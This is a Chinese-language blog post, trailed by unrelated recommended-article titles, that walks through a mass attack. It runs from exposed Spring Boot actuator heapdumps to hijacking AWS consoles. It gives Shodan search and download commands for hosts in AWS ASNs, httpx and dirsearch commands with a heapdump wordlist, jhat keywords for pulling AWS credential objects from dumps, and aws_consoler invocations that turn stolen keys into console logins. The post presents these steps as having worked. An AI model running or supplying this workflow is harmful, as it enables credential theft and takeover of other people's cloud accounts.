从Spring Boot信息泄露到AWS控制台劫持(攻破aws亚马逊服务器)
0x01 引言
全球云厂商有很多,本文主要针对Spring Boot信息泄露在aws上的利用。
0x02 正文
1) 用shodan分析spring boot服务器在asn上分布的情况
https://beta.shodan.io/search/facet?query=http.favicon.hash%3A116323821&facet=asn
aws的服务器主要分布在as16509和as14618。
2) 通过shodan命令行下载数据
as16509:
shodan download as16509 'http.favicon.hash:116323821 asn:"as16509"' --limit -1
as14618:
shodan download as14618 'http.favicon.hash:116323821 asn:"as14618"' --limit -1
3) 通过httpx探测存活的url
shodan parse --fields ip_str,port --separator : as16509.json.gz | httpx -silent -o as16509.txt
4) 利用dirsearch扫描存在的heapdump文件
- 所用字典:
heapdump
actuator/heapdump
management/heapdump
- 扫描命令
python3 dirsearch.py -L as16509.txt -w wordlist.txt -e *
- 查看结果
cat reports/BATCH-21-03-1616-47-59/ | grep MB
5)利用jhat分析heapdump
jhat -port 7001 heapdump
主要通过以下关键词来寻找凭证:
- 关键词1: com.amazonaws.auth.BasicAWSCredentials
- 关键词2 :com.amazonaws.auth.BasicSessionCredentials
6)利用aws_consoler来伪造aws控制台登陆凭证。凭证能否生成和所拥有的权限大小,取决于iam所分配的权限。
aws_consoler -v -a <accessKey> -s <secretKey>aws_consoler -v -a <awsAccessKey> -s <awsSecretKey> -t <sessionToken>
复制url到浏览器中执行,成功登陆到AWS控制台。
0x03 参考
https://github.com/NetSPI/aws_consoler
https://github.com/maurosoria/dirsearch
https://github.com/projectdiscovery/httpx
https://github.com/LandGrey/SpringBootVulExploit
从Spring Boot信息泄露到AWS控制台劫持(攻破aws亚马逊服务器)相关推荐
- aws 亚马逊 服务器 运行docker run报错 Got permission denied while trying to connect to the Docker daemon socket
问题: 当aws亚马逊服务器使用ec2-user运行docker run创建实例时,因为ec2-user没有权限所以会报错Got permission denied while trying to c ...
- aws亚马逊服务器上配置jdk环境,执行java -version
2019-08-11 1629 星期日 enAn aws技术支持 :一般java这个变量我都配置到 /etc/profile.d/里边,里边创建个 java.sh脚 吧变量写进去后边登录也不会失效 p ...
- aws主机php环境搭建,亚马逊AWS上安装Nginx(Linux,CentOS环境)
以前一直使用Apache服务器,但是在内存贵如油的AWS上,使用省内存的Nginx服务器应该是个不错的选择,它能降低我们很多成本. 我们分以下五步,完成aws上nginx的架设. 1. 安装mysql ...
- aws ec2 mysql 端口_亚马逊:AWS EC2 的 Linux 服务器 开放端口教程
导读:这是一篇用屏幕截图解释如何在 AWS(即 Amazon Web Services)不是 IT 世界中的新术语了.它是 AWS 提供服务器计算作为他们的服务之一,他们称之为 EC(弹性计算).使用 ...
- 如何万网域名解析亚马逊服务器,使用aws ELB后关于proxy_pass 的域名解析问题
最近遇到了一个奇怪的问题,我们的一个需要nginx转发的A接口调用另一个IP服务接口时会报502,但是单独调用IP服务时就OK.并且reload A接口的nginx后,居然就正常了. 看了下A接口的n ...
- 乐鑫esp8266学习rtos3.0笔记:AT指令固件如何二次开发,实现AT指令连接亚马逊AWS IoT平台;
本系列博客学习由非官方人员 半颗心脏 潜心所力所写,不做开发板.仅仅做个人技术交流分享,不做任何商业用途.如有不对之处,请留言,本人及时更改. 基于C SDK的ESP8266开发技术全系列笔记 一.N ...
- 亚马逊(Amazon)新接口SP-API和PII受限信息的开发者申请
SP-API(销售伙伴 API )是一个基于 REST 的 API,亚马逊卖家可以使用这些接口,以编程方式访问他们有关商品.订单.付款.报告等的数据.使用销售伙伴 API 的应用程序可以提高销售效率, ...
- 上海-亚马逊AWS联合创新中心正式启用
2018年6月29日,上海市与亚马逊通技术服务(北京)有限公司(以下简称"亚马逊AWS")共建的上海-亚马逊AWS联合创新中心(简称"联合创新中心")正式启用. ...
- 亚马逊CEO安全主管:沙特政府窃听贝佐斯手机 获取私人信息
[TechWeb]4月1日消息,据路透社报道,亚马逊CEO杰夫·贝佐斯的安全主管日前确认,沙特政府可以访问贝佐斯的手机,并从中获取了私人信息. 加文·德贝克尔长期担任亚马逊安全顾问,他表示,已经结束了 ...
最新文章
- 10000+ gif表情包不是梦,get这一篇文就够了!!!小哥哥快到碗里来,再也不怕斗图没有表情包了
- zabbix 客户端安装
- PC行业为何需要华为们被搅局?
- 中国生物医药行业供需形势透析及未来投资风险评估报告2022-2027年版
- 【iOS atomic、nonatomic、assign、copy、retain、weak、strong】的定义和区别详解
- POJ 3660 Cow Contest
- c中将数组传递给子函数_在C ++中将对象传递给Non-Member函数
- springcloud20---Config加入eureka
- windows 2008 ftp配置及用户权限管理
- 单例设计模式 (2)
- 互联网大厂春节礼盒鄙视链
- HTML课程表应用,可在PC和Android运行
- 基于SpringMVC国际化资源配置方式Demo
- 类垂直站点插件实现与分享
- 班级抽签小程序——项目总结
- 高通SDX12:USB主模式调试及RTL8153驱动移植
- Arduino智能小车——小车测速
- 柯桥在PPT中如何制作翻书动画?
- 如何解决U盘装系统后磁盘总容量变小
- 520浪漫表白,爱要大胆说出来,无法拒绝的浪漫表白网页
热门文章
- pythonclass实例化_Python中实例化class的执行顺序示例详解
- STM32----摸石头过河系列(三)
- 机器学习算法 随机森林学习 之决策树
- 道友,来Rstudio里面看动画了
- blob没权限 ie_vuerouter 源码和动态路由权限分配
- python编写sql注入工具-利用Python实现SQL注入 - Python黑客编程入门系列 - 8
- nginx location 斜杠_【一点资讯】斜杠青年双·11买什么本最划算?光影精灵6让你做“多面娇娃” www.yidianzixun.com...
- lnmp 清除mysql日志,军哥LNMP 如何关闭 Mysql 日志,并且删除 mysql-bin.0000*日志文件...
- C++笔记-異常處理機制(释放堆区空间)
- C++ opengl 纹理过滤之GL_NEAREST